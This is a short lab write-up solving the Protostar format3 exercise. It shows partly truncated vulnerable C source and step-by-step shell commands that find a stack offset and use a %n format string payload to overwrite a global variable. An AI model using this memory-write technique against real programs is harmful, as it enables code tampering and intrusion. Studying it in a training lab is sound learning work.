Protostar Format3 – Writeup

I love to test Format String vulnerable because it fun. Let’s get start.


This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory.


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)

void vuln()
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  if(target == 0x01025544) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %08x :(\n", target);

int main(int argc, char **argv)

In this task,we need to change the value 0x01025544 of target variable.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "%08x"')) | ./format3
target is 00000000 :(

Test with input value (AAAA)

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format3
target is 00000000 :(

41414141 is locate on 12 😀 .

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%12$08x."')) | ./format3
target is 00000000 :(

Pretty Good!. Let’s change the value but we need to get the address of target variable. so we can use objdump

[email protected]:/opt/protostar/bin$ objdump -t ./format3 | grep target
080496f4 g     O .bss	00000004              target

Exploit it

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%12$08n"')) | ./format3
target is 00000004 :(

Target is 4 but we need to change another flag value. we can use let command to get the length.

[email protected]:/opt/protostar/bin$ let x=0x01025544; echo $x;

Need to remove 4 bytes AAAA 16930116 – 4 and use %u for hex.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%16930112u"+"%12$08n"')) | ./format3

Bango! We got it! Thanks for reading. Happy Hacking.